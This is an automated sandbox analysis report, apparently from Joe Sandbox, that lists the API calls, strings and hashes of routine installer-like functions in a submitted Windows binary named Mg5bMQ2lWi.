Part of subcall function 0044AEAC: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044EFC9,004970B6), ref: 0044AED3
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044AEEB
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044AEFD
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044AF0F
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044AF21
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF33
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF45
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044AF57
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044AF69
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044AF7B
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044AF8D
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044AF9F
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044AFB1
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044AFC3
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044AFD5
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044AFE7
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044AFF9
Part of subcall function 0044AEAC: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B00B

LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004970D9), ref: 00463D2B
GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00463D31

Strings

shell32.dll, xrefs: 00463D26
SHPathPrepareForWriteA, xrefs: 00463D21

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: SHPathPrepareForWriteA$shell32.dll
API String ID: 2238633743-2683653824
Opcode ID: cec96aa5f796286b6b1f0dc5ec591c4641b52a537a2fc1f69b6a30b1eceec279
Instruction ID: dcd617acd20af11e442c32675adda2be3f923d80830e775180bb661fb25f4313
Opcode Fuzzy Hash: cec96aa5f796286b6b1f0dc5ec591c4641b52a537a2fc1f69b6a30b1eceec279
Instruction Fuzzy Hash: 67B092A0A80780A8DE10BFB3A84390B28248590B1AB20443B30207A093EB7C45145E6F

Function 0047C274 Relevance: 6.2, APIs: 4, Instructions: 194fileCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNEL32(000000FF,?,00000000,0047C3E4,?,?,?,?,00000000,0047C539,?,00000000,0000003C,00000000,?,0047C68D), ref: 0047C3C0
FindClose.KERNEL32(000000FF,0047C3EB,0047C3E4,?,?,?,?,00000000,0047C539,?,00000000,0000003C,00000000,?,0047C68D,00000000), ref: 0047C3DE

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Find$CloseFileNext
String ID:
API String ID: 2066263336-0
Opcode ID: c8920c4e496049598e8e4d691bd77c9b57a1904a5ea7081e96ee31db71d01ce9
Instruction ID: ee88cb3e7f5f0e7034babd07dab097b82f9cbcdb14299ae6248908863b530e43
Opcode Fuzzy Hash: c8920c4e496049598e8e4d691bd77c9b57a1904a5ea7081e96ee31db71d01ce9
Instruction Fuzzy Hash: 5981317090025DAFCF11DFA5CC91ADFBBB9EF49304F5084AAE808A7291D7399A46CF54

Function 0047452C Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 114COMMON

Download Yara Rule

APIs

Part of subcall function 0042ECA4: GetTickCount.KERNEL32 ref: 0042ECAA

Part of subcall function 0042EAFC: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042EB31

GetLastError.KERNEL32(00000000,004746A1,?,?,0049B178,00000000), ref: 0047458A

Strings

, xrefs: 004745C2, 004745DD
MoveFileEx, xrefs: 004745EF
LoggedMsgBox returned an unexpected value. Assuming Cancel., xrefs: 0047465F

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CountErrorFileLastMoveTick
String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
API String ID: 2406187244-2685451598
Opcode ID: efc54fff5a2ae185733b88f25fecc7f4665324125684443dd4ac39fac187bdd2
Instruction ID: 473eb97c6ec8267434c8776fb474a14b66813a9beba34573b5150fcc090343b6
Opcode Fuzzy Hash: efc54fff5a2ae185733b88f25fecc7f4665324125684443dd4ac39fac187bdd2
Instruction Fuzzy Hash: 79416370A002099FCB10EFA5D882AEE77B4EF89314F518537E504B7395D73C9A05CBA9

Function 00413D08 Relevance: 6.1, APIs: 4, Instructions: 107COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00413D56
GetDesktopWindow.USER32 ref: 00413E0E

Part of subcall function 00418ED0: 6F59C6F0.COMCTL32(?,00000000,00413FD3,00000000,004140E3,?,?,0049A628), ref: 00418EEC
Part of subcall function 00418ED0: ShowCursor.USER32(00000001,?,00000000,00413FD3,00000000,004140E3,?,?,0049A628), ref: 00418F09

SetCursor.USER32(00000000,?,?,?,?,00413B03,00000000,00413B16), ref: 00413E4C

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CursorDesktopWindow$Show
String ID:
API String ID: 2074268717-0
Opcode ID: bdf797e27c36325bb8c82eddb0fe25cd735ab4185a90c7389a74a707800caf49
Instruction ID: b367783c8e347dee620bf4ebb942fef05e7de29136c442ebf2d1f3a12f6593d4
Opcode Fuzzy Hash: bdf797e27c36325bb8c82eddb0fe25cd735ab4185a90c7389a74a707800caf49
Instruction Fuzzy Hash: 14415C75700250AFCB10EF39E984B9677E1AB64325F16807BE404CB365DA38ED91CF9A

Function 00408A5C Relevance: 6.1, APIs: 4, Instructions: 95windowCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A7D
LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AEC
LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B87
MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BC6

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: LoadString$FileMessageModuleName
String ID:
API String ID: 704749118-0
Opcode ID: e5f82f84354ef0ca283ae45606e551eda4c159cf8a0135734a08b6be587c5a6c
Instruction ID: 4dc4f8fa8e31f5a504acc487101d04bf7196a45c85b280592f63b9c2e46bb1d6
Opcode Fuzzy Hash: e5f82f84354ef0ca283ae45606e551eda4c159cf8a0135734a08b6be587c5a6c
Instruction Fuzzy Hash: 933154706083849EE330EB65C945BDB77E89B86304F40483FB6C8D72D1DB79A9088767

Function 0044E118 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E161

Part of subcall function 0044C7A4: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044C7D6

InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E1E5

Part of subcall function 0042BBC4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBD8

IsRectEmpty.USER32(?), ref: 0044E1A7
ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E1CA

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
String ID:
API String ID: 855768636-0
Opcode ID: 9a7a18137ec586f3ae39864321f244483684a0ffa01bccee3b65953e1ffa7791
Instruction ID: 2ff42263b9fd8d0bf3ebcb41181b8f96e25d68336b74147511caae446a0df0b7
Opcode Fuzzy Hash: 9a7a18137ec586f3ae39864321f244483684a0ffa01bccee3b65953e1ffa7791
Instruction Fuzzy Hash: A8114A72B4030127E310BA7E9C86B5B76899B88748F05483FB506EB383DEB9DC094399

Function 00493D84 Relevance: 6.1, APIs: 4, Instructions: 81COMMON

Download Yara Rule

APIs

OffsetRect.USER32(?,?,00000000), ref: 00493DE8
OffsetRect.USER32(?,00000000,?), ref: 00493E03
OffsetRect.USER32(?,?,00000000), ref: 00493E1D
OffsetRect.USER32(?,00000000,?), ref: 00493E38

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: OffsetRect
String ID:
API String ID: 177026234-0
Opcode ID: cfbccf1d698e82d79065cf95299db1547cf674505700e5d727bb5bb08f6f6c11
Instruction ID: 626cbd3239d4ed1d666785e4d5506dc5f63added092c4cfac4a9a75855a5826e
Opcode Fuzzy Hash: cfbccf1d698e82d79065cf95299db1547cf674505700e5d727bb5bb08f6f6c11
Instruction Fuzzy Hash: EF217AB6704201AFD700DE69CD85EABBBEEEBC4304F14CA2AF554C7249D634ED0487A6

Function 00417228 Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetCursorPos.USER32 ref: 00417270
SetCursor.USER32(00000000), ref: 004172B3
GetLastActivePopup.USER32(?), ref: 004172DD
GetForegroundWindow.USER32(?), ref: 004172E4

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Cursor$ActiveForegroundLastPopupWindow
String ID:
API String ID: 1959210111-0
Opcode ID: 8d64426bf1faa67f7e63d5b49e58984f19945b6ec6e4dfcc44bb455274275b92
Instruction ID: d42235d32f12bbd537443306c781531a61dc82822ae97907460fdfc4b9dfd860
Opcode Fuzzy Hash: 8d64426bf1faa67f7e63d5b49e58984f19945b6ec6e4dfcc44bb455274275b92
Instruction Fuzzy Hash: E02183313086018BCB20EB69D885AD773B1AB44758F4545ABF895CB352D73DDC82CB89

Function 00493A3C Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,00000008,?), ref: 00493A51
MulDiv.KERNEL32(?,00000008,?), ref: 00493A65
MulDiv.KERNEL32(?,00000008,?), ref: 00493A79
MulDiv.KERNEL32(?,00000008,?), ref: 00493A97

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
Instruction ID: 4fded1b76b16cf5233eb9f491647a43cf70802087f48ea21bc09c20ce05eabc8
Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
Instruction Fuzzy Hash: D011FE72604204ABCB40DEA9D8C4D9B7BECEF4D364B1541AAF918DB246D674ED408BA8

Function 0041F490 Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON

Download Yara Rule

APIs

GetClassInfoA.USER32(00400000,0041F480,?), ref: 0041F4B1
UnregisterClassA.USER32(0041F480,00400000), ref: 0041F4DA
RegisterClassA.USER32(00498598), ref: 0041F4E4
SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F51F

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Class$InfoLongRegisterUnregisterWindow
String ID:
API String ID: 4025006896-0
Opcode ID: 136fc58a234aa641408c6a2d16d1f9be3dcad2dac9a418606983712f211af1eb
Instruction ID: 3ade520867520f28231aed23d56b060c1ae6e85fc3aaaf2b039856689379b016
Opcode Fuzzy Hash: 136fc58a234aa641408c6a2d16d1f9be3dcad2dac9a418606983712f211af1eb
Instruction Fuzzy Hash: 600152B12401047BCB10EF6DED81E9B37999769314B11413BBA05E72E1DA3A9C194BAD

Function 0040D210 Relevance: 6.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D227
LoadResource.KERNEL32(00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047B574,0000000A,REGDLL_EXE), ref: 0040D241
SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047B574), ref: 0040D25B
LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?), ref: 0040D265

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 98a3eb2f97eb90f8deac50020965559c1c53970ac69ea9c81a72a03a0abc3839
Instruction ID: 8b55825d53d46818f15098a3aa340eb6897fe62b828c159971ec5f2842f97e2f
Opcode Fuzzy Hash: 98a3eb2f97eb90f8deac50020965559c1c53970ac69ea9c81a72a03a0abc3839
Instruction Fuzzy Hash: ADF062736046046F8704EE9DA881D5B77ECDE88364310017FF908EB246DA38DD018B78

Function 0046EDD8 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000000), ref: 0046EE29

Strings

Failed to set NTFS compression state (%d)., xrefs: 0046EE3A
Unsetting NTFS compression on directory: %s, xrefs: 0046EE0F
Setting NTFS compression on directory: %s, xrefs: 0046EDF7

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ErrorLast
String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
API String ID: 1452528299-1392080489
Opcode ID: 69acb3433b7424efc8733916a2e3fd5d2b01e13f314b1d1949af057b0dba6a86
Instruction ID: 1e7f5b79b7b83b0710ae0b74761658cb8013dc9fe861025df3af78f0f88b0ad9
Opcode Fuzzy Hash: 69acb3433b7424efc8733916a2e3fd5d2b01e13f314b1d1949af057b0dba6a86
Instruction Fuzzy Hash: B1016734E0824856CF04D7EEA0412DDBBE49F09314F4485EFA855DB383EB7A0A0987AB

Function 004552B8 Relevance: 6.0, APIs: 4, Instructions: 41registrywindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60

RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045AECE,?,?,?,?,?,00000000,0045AEF5), ref: 004552F4
RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045AECE,?,?,?,?,?,00000000), ref: 004552FD
RemoveFontResourceA.GDI32(00000000), ref: 0045530A
SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0045531E

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
String ID:
API String ID: 4283692357-0
Opcode ID: 697a476951aa0a0ca9570e552bc061f69c865505889b6d894dbdf5d1e046680c
Instruction ID: 219cbfe3a978a329188234ed78272d854ba8405160bd4c7ea72be768510c46b8
Opcode Fuzzy Hash: 697a476951aa0a0ca9570e552bc061f69c865505889b6d894dbdf5d1e046680c
Instruction Fuzzy Hash: A3F05EB574070036EA10B6B69C87F2F268C9F98746F10483BBA04EF2C3D97CD804562D

Function 0046F584 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(0000003C,00000000), ref: 0046F5D5

Strings

Setting NTFS compression on file: %s, xrefs: 0046F5A3
Unsetting NTFS compression on file: %s, xrefs: 0046F5BB
Failed to set NTFS compression state (%d)., xrefs: 0046F5E6

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ErrorLast
String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
API String ID: 1452528299-3038984924
Opcode ID: 2ae6e740da7d12cab45fc3fda2904aab771333dfed4c0176c99f618606694c86
Instruction ID: af1263a2bc2d08d5f84e5bf4467a93fc8ad6fd7f39d305876acfad47ab44e8ff
Opcode Fuzzy Hash: 2ae6e740da7d12cab45fc3fda2904aab771333dfed4c0176c99f618606694c86
Instruction Fuzzy Hash: 43016C30D0824865CF14DB9DA0412DDBBE49F09314F5485FFA895DB343EA790A0D8BAB

Function 0047B7B0 Relevance: 6.0, APIs: 4, Instructions: 35sleepCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0047B7D1
GetLastError.KERNEL32 ref: 0047B7DB
GetTickCount.KERNEL32 ref: 0047B7E5
Sleep.KERNEL32(00000032), ref: 0047B7F5

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ErrorLast$CountSleepTick
String ID:
API String ID: 2227064392-0
Opcode ID: 0d6abcf2624c376c92be4fe051ac8c721ea0e8e4158ee005a25feb70aac8199d
Instruction ID: 04319ed9576db886230fb9bc867ee798ddcaac356600663dffa6fb38092a16ff
Opcode Fuzzy Hash: 0d6abcf2624c376c92be4fe051ac8c721ea0e8e4158ee005a25feb70aac8199d
Instruction Fuzzy Hash: 70E09B7230954149DA2935BF28C67BF5588CBC5764F145D3FF08DD6282C91C4C4796BE

Function 00476CAC Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7,?,?,?,?,?,0049719A,00000000), ref: 00476CB5
OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7,?,?,?,?,?,0049719A), ref: 00476CBB
GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7), ref: 00476CDD
CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7), ref: 00476CEE

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ProcessToken$CloseCurrentHandleInformationOpen
String ID:
API String ID: 215268677-0
Opcode ID: 643da1b25484e25618dfc2f33770e0810dba7622c7134d6ef75615b708b11c8e
Instruction ID: 52cacee470f693cc175e787ed480d05e054b7fb82800b5b9fad0ca038f03fef1
